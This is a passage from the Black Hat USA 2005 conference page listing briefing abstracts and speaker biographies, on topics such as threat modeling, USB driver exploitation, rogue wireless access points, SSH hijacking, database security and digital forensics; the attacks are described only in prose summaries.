Black Hat Digital Self Defense USA 2005

Black Hat USA 2005 Main Conference Overview

Black Hat USA 2005 Briefings Speakers Black Hat USA 2005 Briefings Schedule Black Hat USA 2005 Sponsors Black Hat USA 2005 Training Black Hat USA 2005 Hotel & Venue Black Hat Registration
details Current Sponsors for Black Hat Briefings USA 2005
Black Hat USA 2005 Topic descriptions are listed alphabetically by speaker.

Feedback forms will be available at the show. Let us know who was hot, who was not and get a chance to win admission to a future Briefings of your choice.

Black Hat USA 2005 Sponsor
Black Hat Speakers

Return to the top of the page

Investing in Our Nation's Security
Gilman Louie, President and Chief Executive Officer, In-Q-Tel

The challenge of creating an innovative, new business model aimed at enhancing national security convinced Gilman Louie to join In-Q-Tel as its first president and chief executive officer. In this role, Gilman has focused on refining and evolving In-Q-Tel's innovative model, identifying and exploring exciting new developments in technology, and, perhaps most importantly, recruiting and developing a leading team of technologists, entrepreneurs, venture capitalists and strategic visionaries that share a passion for In-Q-Tel's mission.

Return to the top of the page

Rapid Threat Modeling
Akshay Aggarwal, Computer Security Consultant, IOActive Inc.

One of the most important weapons in our arsenal for securing applications is threat modeling. Applications are becoming increasingly complex and new technologies are emerging constantly. In this scenario, building or attacking applications is challenging. Threat models can help attackers discover design vulnerabilities and mount complex attacks. These models give secure application developers a great amount of leverage to envision their design, implementation and soundness of their architectures. Being living documents they also carry forward any knowledge gained from previous development life cycles and are invaluable in understanding the impact of any changes to the overall security posture of the applications. Understanding and constructing meaningful threat models is hard. Application teams and attackers need to be aware of what they want to model, how they want to model and when they want to model. Rapid Threat Modeling will help them develop models rapidly while reutilizing data they gathered either through reconnaissance or through the software development lifecycle. A practical hands-on demonstration of modeling threats for complex managed application will allow for immediate use of any threat modeling knowledge gained.

Akshay Aggarwal currently works for IOActive Inc. as a computer security consultant where he is responsible for conducting security architecture design, application and source-code assessments and vulnerability research. He helps Fortune 100 clients evaluate the security of their software products and applications and develop threat models. He has authored several research papers and been invited to speak at many forums like the Multi-University Research Initiative for Protocol Development and the Center for Information Technology Research in Interest of Society. Akshay holds a MS in Computer Science from the University of California at Davis. There, at the renowned Computer Security Lab, he conducted research on Internet worms and Intrusion detection systems.

Return to the top of the page

The Future of Personal Information
Joseph Ansanelli, CEO, Vontu
Richard Baich, CSO, Choicepoint
Adam Shostack
Paul Proctor,
VP, Security & Risk, Gartner Research

In the last year, there have been 45 security incidents compromising the personal information of 9.3 million individuals. What can we do given our current situation? How are we going to successfully secure personal information moving forward? This panel will discuss the future of personal information and its implications on privacy.

Joseph Ansanelli is CEO of Vontu, a software company focused on the insider threat. Joseph has spoken to Congress twice in the past twelve months as an advocate of privacy and consumer data standards. Mr. Ansanelli has successfully co-founded and led two other companies and has an extensive track record of developing innovative solutions into successful companies. His first venture, Trio Development's Claris Organizer, was ultimately acquired by Palm, Inc. Mr. Ansanelli holds four patents and received a B.S. in Applied Economics from the Wharton School at the University of Pennsylvania

Rich Baich, CISSP, CISM, Chief Information Security Officer, ChoicePoint. Mr. Baich has been working in the Information Security Business for over 10 years and has extensive experience working with government and commercial executives providing risk management and consultative council while developing, improving and implementing security architecture, solutions and policies. He has held security leadership positions as the Cryptolog Officer for the National Security Agency (NSA), Sr. Director Professional Services at Network Associates (now McAfee) and after 9/11 as the Special Assistant to the Deputy Director for the National Infrastructure Protection Center (NIPC) at the Federal Bureau of Investigation (FBI). Rich is the author of a security executive leadership guidebook, “Winning as a CISO.” The book is the first-of-its-kind to detail and provide the roadmap to transform security executives from a technical and subject matter expert to a comprehensive well-rounded business executive. He holds a BS from United States Naval Academy, MBA / MSM from University of Maryland University College, and has been awarded the National Security Telecommunications and Information Systems Security (NSTISSI) 4011 Certification and the NSA sponsored Information Systems Security (INFOSEC) Assessment Methodology (IAM) Certification.

Adam Shostack is a privacy and security consultant and startup veteran. Adam worked at Zero-Knowledge building and running the Evil Genius group of advanced technology experts, building prototypes and doing research into future privacy technologies, including privacy enhancing networks, credentials, and electronic cash. He has published papers on the security, privacy, as well as economics, copyright and trust. Shostack sits on the Advisory Board of the Common Vulnerabilities and Exposures initiative, the Technical Advisory Board of Counterpane Internet Security, Inc and others. Adam is now an independent consultant.

Paul Proctor is a vice president in the security and risk practice of Gartner Research. His coverage includes Legal & Regulatory Compliance, Event Log Management, Security Monitoring (Host/Network IDS/IPS), Security Process Maturity Risk Management Programs, Forensics and Data Classification.

Mr. Proctor has been involved in information security since 1985. He was founder and CTO of two security technology companies and developed both first- and second-generation, host-based intrusion-detection technologies. Mr. Proctor is a recognized expert in the field of information security and associated regulatory compliance issues surrounding the Health Insurance Portability and Accountability Act (HIPAA), Sarbanes-Oxley, and the Gramm-Leach-Bliley Act (GLBA). He has authored two Prentice Hall books and many white papers and articles. Mr. Proctor is an accomplished public speaker and was recognized for his expertise by being appointed to the original Telecommunications Infrastructure Protection working group used by Congress to understand critical infrastructure protection issues prior to the terrorist attack of Sept. 11. Previously, he worked for SAIC, Centrax, CyberSafe, Network Flight Recorder and Practical Security.

Return to the top of the page

A New Hybrid Approach for Infrastructure Discovery, Monitoring and Control
Ofir Arkin, CTO and Co-Founder, Insightix

An enterprise IT infrastructure is a complex and a dynamic environment that is generally described as a black hole by its IT managers. The knowledge about an enterprise network's layout (topology), resources (availability and usage), elements residing on the network (devices, applications, their properties and the interdependencies among them) as well as the ability to maintain this knowledge up-to-date, are all of critical for managing and securing IT assets and resources.

Unfortunately, the current available network discovery technologies (active network discovery and passive network discovery) suffer from numerous technological weaknesses which prevent them from providing with complete and accurate information about an enterprise IT infrastructure. Their ability to keep track of changes is unsatisfactory at best.

The inability to "know" the network directly results with the inability to manage and secure the network in an appropriate manner. This is since it is impossible to manage or to defend something, or against something, its existence is unknown or that only partial information about it exists.

The first part of the talk presents the current available network discovery technologies, active network discovery and passive network discovery, and explains their strengths and weaknesses. The talk highlights technological barriers, which cannot be overcome, with open source and commercial applications using these technologies.

The second part of the talk presents a new hybrid approach for infrastructure discovery, monitoring and control. This agent-less approach provides with real-time, complete, granular and accurate information about an enterprise infrastructure. The underlying technology of the solution enables maintaining the information in real-time, and ensures the availability of accurate, complete and granular network context for other network and security applications.

During the talk new technological advancements in the fields of infrastructure discovery, monitoring and auditing will be presented.

Ofir Arkin is the CTO and Co-founder of Insightix, which pioneers the next generation of IT infrastructure discovery, monitoring and auditing systems for enterprise networks.

Ofir holds 10 years of experience in data security research and management. He has served as a CISO of a leading Israeli international telephone carrier, and worked as a Managing Security Architect at @stake, a US-based security consultancy company. In addition, Ofir has consulted and worked for multinational companies in the financial, pharmaceutical and telecommunication sectors.

Ofir conducts cutting edge research in the information security field and has published several research papers, advisories and articles in the fields of information warfare, VoIP security, and network discovery, and lectured in a number of computer security conferences about the research. The best known papers he had published are: "ICMP Usage in Scanning", "Security Risk Factors with IP Telephony based Networks", "Trace-Back", "Etherleak: Ethernet frame padding information leakage", etc. He is co-author of the remote active operating system fingerprinting tool Xprobe2.

Ofir is an active member with the Honeynet project and co-authored the team's books, "Know Your Enemy" published by Addison-Wesley.

Ofir is the founder of Sys-Security Group, a computer security research group.

Return to the top of the page

Plug and Root, the USB Key to the Kingdom
Darrin Barrall, Guru, SPI Dynamics
David Dewey, Security Engineer, SPI Dynamics

USB peripheral devices are made by reputable manufacturers and will not misbehave by attacking the host system's operating system. This device is not one of those. This discussion will cover the creation of a USB meta-device, the discovery and exploitation of flaws in operating system device drivers. In a nutshell, plug this device into an otherwise locked system and it will automatically take control of the system.

Darrin Barrall has a varied background in both hardware and software. While working in the hardware world, Darrin repaired electronics in devices ranging from televisions to sports arena lighting systems. After transitioning to the software world, his talents further diversified into banking applications, and recently into buffer overflows. Darrin is currently a R&D coder for the SPI Labs group at SPI Dynamics where he specializes in breaking things.

David Dewey is a security engineer for SPI Dynamics. David came to SPI Dynamics with five years of information security experience ranging from firewall and IDS configuration and support to application level assessment and exploit research. As a pre-sales security engineer, and member of the SPI Labs team, the renowned application security research and development group within SPI Dynamics, David assists in developing new tools and researching new threats in the realm of Web application security.

Return to the top of the page

Shakespearean Shellcode
Darrin Barrall, Guru, SPI Dynamics

This discussion will cover the theoretical background of using ordinary, readable text to conceal an exploit payload's true content, ending with a practical application of the discussed technique. Encoding a payload as plain text is useful in cases where input filtering eliminates many of most useful values that make up a payload. In particular, Unicode based systems place numerous constraints on acceptable character values, making it worthwhile to create a simple decoder function to decode far more complex shellcode data. The technique is also useful where content filtering is used, the small amount of unusual text making up the decoder could be outweighed by a large amount of grammatically correct text.

Darrin Barrall has a varied background in both hardware and software. While working in the hardware world, Darrin repaired electronics in devices ranging from televisions to sports arena lighting systems. After transitioning to the software world, his talents further diversified into banking applications, and recently into buffer overflows. Darrin is currently a R&D coder for the SPI Labs group at SPI Dynamics where he specializes in breaking things.

Return to the top of the page

[ Back-up Speaker ]
Reverse Engineering Network Protocols using Bioinformatics
Marshall A. Beddoe, McAfee, Inc

Network protocol analysis is currently performed by hand using only intuition and a protocol analyzer tool such as tcpdump or Ethereal. This talk presents Protocol Informatics, a method for automating network protocol reverse engineering by utilizing algorithms found in the bioinformatics field. In order to determine fields in protocol packets, samples are aligned using multiple string alignment algorithms and their consensus sequences are analyzed to understand the beginning and the end of fields in the packet.

Marshall Beddoe is currently a Research Scientist with McAfee, Inc. Prior to McAfee, Marshall worked for Foundstone performing general computer security research and development. His main focus is on the introduction of cross disciplinary methods and techniques into the realm of computer security. He has performed extensive research on protocol analysis, passive network mapping and operating system identification. He can be reached at

Return to the top of the page

Rogue Squadron: Evil Twins, 802.11intel, Radical RADIUS, and Wireless Weaponry for Windows
Beetle, the Shmoo Group
Bruce Potter,
the Shmoo Group

At DefCon 11, a rogue access point setup utility named "Airsnarf" was presented by the Shmoo Group. Two years later, "Evil Twin" access points have made it to Slashdot and Who would have thought TSG could get away with the easy rogue AP attacks for so long? Note to Shmoo: Next time, put the word "evil" in the title of your presentation for mass appeal and acceptance. Oh, rock on--it WORKED!

Wireless n00b? No problem0. This talk starts off with the basics. Wireless insecurity basics. Rogue AP basics. How your wireless users are basically screwed. Etc. If you read about "Evil Twin" access points earlier this year, you will actually see how easy it is to build your own. However, this talk quickly moves on to more advanced attacks and trickery with rogue APs, including: gathering intel beyond usernames / passwords, getting around WEP and WPA-PSK protected networks, integrating RADIUS with your rogue AP, abusing vulnerable EAPs, rogue AP backend bridging, and real-time abuse of two-factor authentication a la Bruce Schneier's Springtime scary story. Even wireless warriors will learn an entertaining trick or two. You want demonstrations? Okey dokey. You'll have them.

Once everyone has the willies, the "professional" and "responsible" portion of this talk, albeit minimal, will cover rogue AP defense. Basic wireless security architectures and to-dos for home users, hotspot users, and enterprise wireless network admins are covered, as well as client-side defensive tools, WIDS considerations, and roll-your-own options.

But wait! There's more! For the closet Microsoft fanboy in all of us, wireless weapons for Windows are covered--both offense and defense. Why launch a rogue AP attack when you can launch three? Rogue AP attacks for the masses! The release of "Rogue Squadron"! It's a bizarre look at how to be a social engineering badboy with 802.11b—presented by Beetle of the Shmoo Group. If you want to know what the press will pick up on two years from now, you should probably check this out. Otherwise, move along. These are not the APs you are looking for.

Beetle is a member of the Shmoo Group, holds a BS in Computer Science, and is a D.C.-area computer security engineer. He is a geek, and he is a licensed amateur racecar driver—the perfect combination for successfully working and driving around the nation's capital. He presented on the topic of rogue access points at DefCon 11 and Black Hat Federal, demonstrating his rogue AP setup utility Airsnarf. Last year, he and the Shmoo Group pimped some of their new wireless gadgets, such as 802.11bounce and the Sniper Yagi, at DefCon 12, and
Beetle unleashed Wireless Weapons of Mass Destruction for Windows at ToorCon last fall. This year, Beetle swears he is taking a break of sorts, having recently organized an East coast hacker conference in D.C. called ShmooCon this past Winter, while reminding people that rogue APs and "Evil Twins" are NOT new, and presenting on wireless topics at several other conferences this past Spring.

Bruce Potter is the founder of the Shmoo Group of security professionals, a group dedicated to working with the community on security, privacy, and crypto issues. His areas of expertise include wireless security, large-scale network architectures, smartcards and promotion of secure software engineering practices. Mr. Potter coauthored the books "802.11 Security", published in 2003 by O'Reilly, "Mac OS X Security" by New Riders in 2003 and "Mastering FreeBSD and OpenBSD Security" by O'Reilly published in April 2005. Mr. Potter was trained in computer science at the University of Alaska, Fairbanks. Bruce Potter is a Senior Associate with Booz Allen Hamilton.

Return to the top of the page

A Dirty BlackMail DoS Story
Renaud Bidou, Radware

This is a real story of modern extortion in a cyberworld. Bots have replaced dynamite and you don't buy "protection" to prevent your shop from going in flames; you buy "consulting" to prevent your IT from beeing DoSed. From the first limited synflood to the conclusion, we will review those crazy 48 hours that end up in a one to one digital fight. We will see in depth which attacks and mitigation techniques where involved and how they both evolved quickly in complexity and intensity. As a conclusion we will see which were the major weaknesses, found either in the network architecture, the security perimeter and the target application, and how it would have been possible to prevent such attack, limit its impact... and save money.

Renaud Bidou has been working in the field of IT security for about 10 years. He first performed consulting missions for telcos, pen-tests and post-mortem audits, and designed several security architectures. In 2000 he built the first operational Security Operation Center in France which quickly became the 4th French CERT and member of the FIRST. He then joined Radware as the security expert for Europe, handling high criticity security cases.

In the mean time Renaud is an active member of the rstack team and the French Honeynet Project with studies on honeynet containment, honeypot farms and network traffic analysis. He regularly publishes research articles in the French security magazine MISC and teaches in several universities in France.

Return to the top of the page

Trust Transience: Post Intrusion SSH Hijacking
Adam Boileau

Trust Transience: Post Intrusion SSH Hijacking explores the issues of transient trust relationships between hosts, and how to exploit them. Applying technique from anti-forensics, linux VXers, and some good-ole-fashioned blackhat creativity, a concrete example is presented in the form of a post-intrusion transparent SSH connection hijacker. The presentation covers the theory, a real world demonstration, the implementation of the SSH Hijacker with special reference to defeating forensic analysis, and everything you'll need to go home and hijack yourself some action.

Adam Boileau is a deathmetal listening linux hippy from New Zealand. When not furiously playing air-guitar, he works for linux integrator and managed security vendor Asterisk in Auckland, New Zealand. Previous work has placed him in ISP security, network engineering, linux systems programming, corporate whore security consultancy and a brief stint at the helm of a mighty installation of solaris tar. Amongst his preoccupations at the moment are the New Zealand Supercomputer Centre, wardriving-gps-visualization software that works in the southern hemisphere, and spreading debian and python bigotry. Oh, and Adam's band 'Orafist' needs a drummer - must have own kit and transport to New Zealand.

Return to the top of the page

Executive Women’s Forum Panel and Reception - Sometimes, It Is All Who You Know!
Moderator: Joyce Brocaglia, CEO, Alta Associates and Founder of the EWF
Pamela Fusco, CSO, Merck
Kelly Hansen, CEO, Neohapsis
Rhonda E. MacLean, Senior VP,CISO, Bank of America

How strong is your professional network? Do you know who to call upon for support within your company? How about discreet support from outside your company? Building a strong network of support within your company or business is critical for success. The Executive Women’s Forum (EWF) is a group of over 200 of the most senior executive women in information security, risk management and privacy who meet yearly to share experiences and build trust based relationships. The EWF will host a networking event for all women attending Black Hat USA 2005. Come and get to know your peers and past EWF participants. This two-hour workshop will begin with a panel discussion talking about different roads to the top and the importance of networking.  The interactive panel will be followed by intense networking and a reception. Learn more about the about the EWF at

Joyce Brocaglia is president and chief executive officer of Alta Associates, the premier executive recruitment firm for the information security industry. In 2003, Brocaglia founded the Executive Women’s Forum. In September of 2003, Information Security Magazine honored her with a “Women of Vision” award naming her one of the 25 most influential women in the information security industry. She is the career advisor of CSO Magazine and author of the monthly “Career Corner” column for the Information Systems Security Association (ISSA) Journal Magazine. Ms. Brocaglia also serves on the board of advisors for the Information Systems Security Association and ISC2.

Pamela Fusco, CISSP, CISM, CHS-III, Chief Security Officer, Merck & Co., Inc.
Pamela Fusco is an Executive Global Information Security Professional, for Merck & CO., Inc. She has accumulated over 19 years of substantial experience within the Security Industry. Her extensive background and expertise expand globally encompassing all facets of security inclusive of logical, physical, personal, facilities, systems, networks, wireless, and forensic investigations. Presently she leads a talented team of Compliance, Systems and Information Security Engineers operating a world-wide 24X7X365 SIRT (security incident response team).

Kelly Hansen is CEO of Neohapsis, a leading-edge provider of information security consulting, computer forensics, and enterprise IT product-testing services. Kelly also writes a regular column for Secure Enterprise Magazine and contributes to Network Computing Magazine. Kelly is an Executive Board member of the Wisconsin Technology Council, a non-profit corporation established to implement programs crucial to the future success of Wisconsin based high-tech companies. Kelly is also on the Advisory Team for the Executive Women’s Forum, a community of more than 150 executive women in security. Kelly is an established and well-known public speaker. She has keynoted for an FBI’s Infraguard conference and given extensive training seminars for organizations as diverse as the Association of American Insurers, the National Association of Restaurants, and the American Law Firm Association. In addition, she has conducted Continuing Legal Education (CLE) accredited seminars for the State Bar Associations in Wisconsin, Illinois and Minnesota. Prior to joining Neohapsis, Kelly was president and CEO of Sun Tzu Security, a security consulting firm she founded in 1996. Kelly graduated from the University of Rochester and holds a Masters from Harvard University.

Rhonda E. MacLean is Senior Vice President and Chief Information Security Officer for Bank of America. She is responsible for the company’s information security policies and awareness, information risk management; security technology implementations, and cyber investigations. MacLean has spent more than 20 years in the information technology industry. Immediately before joining Bank of America in 1996, MacLean was responsible for information security at The Boeing Company. MacLean served as the chairperson of the Financial Services Sector Coordinating Council for Critical Infrastructure Protection and Homeland Security from 2002-2004 and also as advisor to the Congressional Subcommittee on Technology in her capacity as a member of the Corporate Information Security Working Group. She sits on the Global Council of CSOs, a think tank of senior cyber leaders. She continues to work with BITS, the technology group for The Financial Services Roundtable as a member of the Executive Committee.

Return to the top of the page

Toolkits: All-in-One Approach to Security
Kevin Cardwell

This talk will be on using toolkits for your pen-testing, vulnerability assessment etc. Configuring a plethora of the different tools out there can be quite time consuming, and challenging. The focus of this talk will be to look at an alternative solution that provides a suite of tools at boot. Until recently there was not very many toolkits, and the ones that were there did not work very well, that has changed and in this talk I will discuss the toolkits available, and demo one of the better ones. The toolkits that will be reviewed will all be open source, and free, there are commercial solutions available, but why pay when the free ones are more than adequate.

Kevin Cardwell spent 22 years in the U.S. Navy, starting off in Sound Navigation and Ranging (SONAR). He began programming in 1987. He was fortunate enough to get on the Testing Team and got to test and evaluate Surveillance and Weapon system software including; Remote Mine-Hunting System, Multi-System Torpedo Recognition Alert Processor (MSTRAP), Advanced Radar Periscope Discrimination Detection System (ARPDD), Tactical Decision Support Subsystem (TDSS) and Computer Aided Dead Reckoning Tracer (CADRT). Shortly thereafter he became a software and systems engineer and was was selected to head the team that built a Network Operation Center (NOC) that provided services to the command ashore and ships at sea in the Norwegian Sea and Atlantic Ocean.

In 2000, Cardwell formed his own Engineering Solutions company and has been providing consulting services for companies throughout the UK and Europe. He is also an Adjunct Associate Professor for the University of Maryland University College and is the European rep for the Information Assurance curriculum. He holds a BS in Computer Science from National University in California and a MS in Software Engineering from the Southern Methodist University (SMU) in Texas.

Return to the top of the page

Demystifying MS SQL Server & Oracle Database Server Security
Cesar Cerrudo, Argeniss

Databases are where your most valuable data rest, when you use a database server you implicitly trust the vendor, because you think you bought a good and secure product. This presentation will compare MS SQL Server and Oracle Database Server from security standpoint, comparison will include product quality, holes, patches, etc. This presentation will also show how both vendors manage security issues and how they have evolved over time. The main goal of this presentation is to kill the myths surrounding both products and let people know the truth about how secure these products are.

Cesar Cerrudo is a security researcher specialized in application security. Cesar is running his own company, Argeniss. Regarded as a leading application security researcher, Cesar is credited with discovering and helping fix dozens of vulnerabilities in applications including Microsoft SQL Server, Oracle database server, Microsoft BizTalk Server, Microsoft Commerce Server, Microsoft Windows, Yahoo! Messenger, etc. Cesar has authored several white papers on database and application security and has been invited to present at a variety of companies and conferences including Microsoft, Black Hat, Bellua and CanSecWest.

Return to the top of the page

Checking Array Bound Violation Using Segmentation Hardware
Tzi-cker Chiueh, Professor, Stony Brook University

The ability to check memory references against their associated array/buffer bounds helps programmers to detect programming errors involving address overruns early on and thus avoid many difficult bugs down the line. Because such programming errors have been the targets of remote attacks, i.e., buffer overflow attack, prevention of array bound violation is essential for the security and robustness of application programs that provide service on the Internet.

This talk proposes a novel approach called CASH to the array bound checking problem that exploits the segmentation feature in the virtual memory hardware of the X86 architecture.

The CASH approach allocates a separate segment to each static array or dynamically allocated buffer, and generates the instructions for array references in such a way that the segment limit check in X86's virtual memory protection mechanism performs the necessary array bound checking for free. In those cases that hardware bound checking is not possible, it falls back to software bound checking. As a result, CASH does not need to pay per-reference software checking overhead in most cases. However, the CASH approach incurs a fixed set-up overhead for each use of an array, which may involve multiple array references. The existence of this overhead requires compiler writers to judiciously apply the proposed technique to minimize the performance cost of array bound checking.

This talk will describe the detailed design and implementation of the CASH compiler, and a comprehensive evaluation of various performance tradeoffs associated with the proposed array bound checking technique. For the set of production-grade network applications we tested, including Apache, Sendmail, Bind, etc., the latency penalty of CASH's bound checking mechanism is between 2.5% to 9.8% when compared with the baseline case that does not perform any bound checking.

Dr. Tzi-cker Chiueh is a Professor in the Computer Science Department of Stony Brook University, and the Chief Scientist of Rether Networks Inc. He received his B.S. in EE from National Taiwan University, M.S. in CS from Stanford University, and Ph.D. in CS from University of California at Berkeley in 1984, 1988, and 1992, respectively. He received an NSF CAREER award in 1995, and has published over 130 technical papers in refereed conferences and journals in the areas of operating systems, networking, and computer security. He has developed several innovative security systems/products in the past several years, including SEES (Secure Mobile Code Execution Service), PAID (Program Semantics-Aware Intrusion Detection), DOFS (Display-Only File Server), and CASH.

Return to the top of the page

The Defense Cyber Crime Center
Jim Christy, Supervisory Special Agent and Director, Defense Cyber Crime Institute, Department of Defense

This talk will cover the Defense Cyber Crime Center (DC3), our mission and capabilities. The DC3 is one-stop shopping for cyber crime related support. We have approximately 160 people assigned in 3 main organizations:

  • The Defense Computer Forensics Lab - probably the largest digital forensics lab in the world and the leader in handling large datasets. One case averages 75 terabytes.
  • The Defense Computer Investigations Training Program - the most high-tech classrooms in the world, training all of the DoD criminal and counterintelligence agents on the techniques to investigate cyber crime. FBI, Secret Service and Department of State, Diplomatic Security Service actually buy our courses for their agents due to the quality.
  • The Defense Cyber Crime Institute - my organization, responsible for research and development of new digital forensics tools as well as the validation, test and evaluation of these tools.

Since crime labs now are moving to accreditation so that their evidence will be admissible in court, all of the tools used in a crime lab must first be independently tested and validated. You can't download the latest and greatest tool from the Internet or purchase it and use it without validating it first.

Digital forensics is now a recognized forensic discipline just like, ballistic, serology, DNA, handwriting analysis, and finger print analysis. As such, there are best practices that must be adhered to. The discipline is on the cusp, moving from adhoc to certified professionals. The institute would like to be the consumer reports for digital forensics tools someday. Check out our website,

Return to the top of the page

Legal Aspects of Computer Network Defense-A Government Perspective & A Year in Review Important Precedents in Computer and Internet Security Law 2004 - 2005
Robert W. Clark, Command Judge Advocate, 1st Information Operations Command (LAND) (ACERT Legal Advisor) U.S. Army

This presentation looks at computer network defense and the legal cases of the last year that affect internet and computer security. This presentation clearly and simply explains (in non-legal terms) the legal foundations available to service providers to defend their networks. Quickly tracing the legal origins from early property common-law doctrine into today’s statutes and then moving into recent court cases and battles. This presentation will quickly become an open forum for questions and debate.

Major Robert Clark is the Command Judge Advocate for the Army’ 1st Information Operations Command. As the sole legal advisor, his primary duty is to advise the Army’s Computer Network Operations Division on all aspect of computer operations and security. This role has him consulting with the DoD Office of General Counsel, NSA, and DoJ Computer Crime and Intellectual Property Section. He lectures at the Army’s Intelligence Law Conference and at the DoD’s Cybercrimes Conference.

Return to the top of the page

Routing in the Dark: Scalable Searches in Dark P2P Networks.
Ian Clarke
Oskar Sandberg

It has become apparent that the greatest threat toward the survival of peer to peer, and especially file sharing, networks is the openness of the peers themselves towards strangers. So called "darknets"—encrypted networks where peers connect directly only to trusted friends—have been suggested as a solution to this. Some, small-scale darknet implementations such a Nullsofts WASTE have already been deployed, but these share the problem that peers can only communicate within a small neighborhood.

Utilizing the small world theory of Watts and Strogatz, Jon Kleinbergs algorithmic observations, and our own experience from working with the anonymous distributed data network Freenet, we explore methods of using the dynamics of social networks to find scalable ways of searching and routing in a darknet. We discuss how the results indicating the human relationships really form a "small world", allow for ways of restoring to the darknet the characteristics necessary for efficient routing. We illustrate our methods with simulation results.

This is, to our knowledge, the first time a model for building peer to peer networks that allow for both peer privacy and global communication has been suggested. The deployment of such networks would offer great opportunities for truly viable peer to peer networks, and a very difficult challenge to their enemies.

Ian Clarke is the architect and coordinator of The Freenet Project, and the Chief Executive Officer of Cematics Ltd, a company he founded to realise commercial applications for the Freenet technology. Ian is the co-founder and formerly the Chief Technology Officer of Uprizer Inc., which was successful in raising $4 million in A-round venture capital from investors including Intel Capital. In October 2003, Ian was selected as one of the top 100 innovators under the age of 35 by the Massachusetts Institute of Technology's Technology Review magazine. Ian holds a degree in Artificial Intelligence and Computer Science from Edinburgh University, Scotland. He has also worked as a consultant for a number of companies including 3Com, and Logica UK's Space Division. He is originally from County Meath, Ireland, and currently resides in Edinburgh, Scotland.

Oskar Sandberg is a post graduate student at the Chalmers Technical University in Gothenburg, Sweden. He is working on a PhD about the mathematics of complex networks, especially with regard to the small world phenomenon. Besides this he has an active interest in distributed computer networks and network security, and has been an active contributor to The Freenet Project since 1999.

Return to the top of the page

Shatter-proofing Windows
Tyler Close

The Shatter attack uses the Windows API to subvert processes running with greater privilege than the attack code. The author of the Shatter code has made strong claims about the difficulty of fixing the underlying problem, while Microsoft has, with one exception, claimed that the attack isn't a problem at all. Whether or not Shatter is indeed an exploit worth worrying about, it uses a feature of Windows that has other malicious uses, such as keystroke logging. This talk presents a means of defeating this entire family of attacks with minimal breaking of applications and effect on the look and feel of the user interface.

Tyler Close is a researcher and developer, working in the field of secure, multi-user, distributed applications since 1998. He is the designer of the web-calculus, a messaging model for creating POLA interfaces between heterogeneous applications. He is a developer for an ongoing series of applications in the POLA genre, including: Waterken Server, for web-services; petname tool, anti-phishing browser extension; httpsy, decentralized authentication for the WWW; E language, P2P scripting language; Waterken DB, capability-based object database; Waterken IOU, generic rights transfer protocol. Tyler joined HP as a Visiting Scientist in 2005 to work on the Virus Safe Computing Initiative.

Return to the top of the page

Beyond Ethereal: Crafting A Tivo for Security Datastreams
Greg Conti, Assistant Professor of Computer Science, United States Military Academy, West Point, New York

Ethereal is a thing of beauty, but ultimately you are constrained to a tiny window of 30-40 packets that is insufficient when dealing with network datasets that could be on the order of millions of packets. In addition, it only displays traffic from packet captures and lacks the ability to incorporate and correlate other security related datastreams. In an attempt to break from this paradigm, we will explore conceptual, system design and implementation techniques to help you build better security analysis tools. By applying advanced information visualization and interaction techniques such as dynamic queries, interactive encoding, semantic zooming, n-gram analysis and rainfall visualization you will gain far more insight into your data, far more quickly than with today‚s best tools. We will discuss lessons learned from the implementation of a security PVR (a prototype will be released) and explore additional topics such as using visual techniques to navigate and semantically encode small and large binary objects, such as executable files, to improve reverse engineering. To get the most out of this talk you should have a solid understanding of the OSI model and network protocols.

Greg Conti is an Assistant Professor of Computer Science at the United States Military Academy. He holds a Masters Degree in Computer Science from Johns Hopkins University and a Bachelor of Science in Computer Science from the United States Military Academy. His areas of expertise include network security, information visualization and information warfare. Greg has worked at a variety of military intelligence assignments specializing in Signals Intelligence. Currently he is on a Department of Defense Fellowship and is working on his PhD in Computer Science at Georgia Tech. His work can be found at and

Return to the top of the page

U.S National Security, Individual and Corporate Information Security, and Information Security Providers
Bryan Cunningham, Principal, Morgan & Cunningham, Former Deputy Legal Adviser to the White House National Security Council, Founding Co-Chair of American Bar Association’s Cybersecurity and Privacy Task Force. 
C. Forrest Morgan, Principal, Morgan & Cunningham,

This presentation, by a former Deputy Legal Adviser to the White House National Security Council, and author of a chapter on legal issues in the forthcoming “Case Studies for Implementing the NSA IEM,” will provide information security consultants and information technology providers alike with insights into: how emerging United States national security and cybersecurity policies and initiatives could impact the work of consultants and technology providers; emerging standards of potential legal and regulatory liability for such consultants and providers; and strategies for mitigating risk and protecting proprietary and vulnerabilities information.

Bryan Cunningham has extensive experience as a cybersecurity and intelligence expert, both in senior U.S. Government posts and the private sector.  Cunningham, now a corporate information and homeland security consultant and principal at the Denver law firm of Morgan & Cunningham LLC, most recently served as Deputy Legal Adviser to National Security Advisor Condoleezza Rice. At the White House, Cunningham drafted key portions of the Homeland Security Act, and was deeply involved in the formation of the National Strategy to Secure Cyberspace, as well as numerous Presidential Directives and regulations relating to cybersecurity. He is a former senior CIA Officer and federal prosecutor, founding co-chair of the ABA CyberSecurity Privacy Task Force, and, in January 2005, was awarded the National Intelligence Medal of Achievement for his work on information issues. Cunningham holds a Top Secret Security Clearance and counsels corporations on information security programs, as well as information security consultants on how to structure and conduct their assessments and remediation to mitigate potential liability.

C. Forrest Morgan  (JD (1987), Trained in NSA IAM) has extensive experience in corporate practice and structure including contracting, corporate formation, and operations. Mr. Morgan advises information security consultants on drafting and negotiating contracts with their customers to best protect them against potential legal liability. Mr. Morgan's practice also has emphasized commercial contract drafting and reorganization, and corporate litigation, providing in-depth understanding of the business and legal environment. He has represented both national corporations and regional firms in state and federal courts and administrative agencies in matters of litigation, creditors' rights, bankruptcy, administrative law and employment issues. Mr. Morgan served as the Regional Editor of the Colorado Bankruptcy Court Reporter from 1989 to 1992, and he co-authored the Bankruptcy section of the Annual Survey of Colorado from 1991 to 1997. As a Principal of the Denver law firm of Morgan & Cunningham, LLC, Mr. Morgan's practice also includes corporate information and security consulting. He counsels corporations on information security programs, including development of corporate policies and procedures to minimize business risks and litigation exposure.

Return to the top of the page

iSCSI Security (Insecure SCSI)
Himanshu Dwivedi, Principal Partner, Information Security Partners

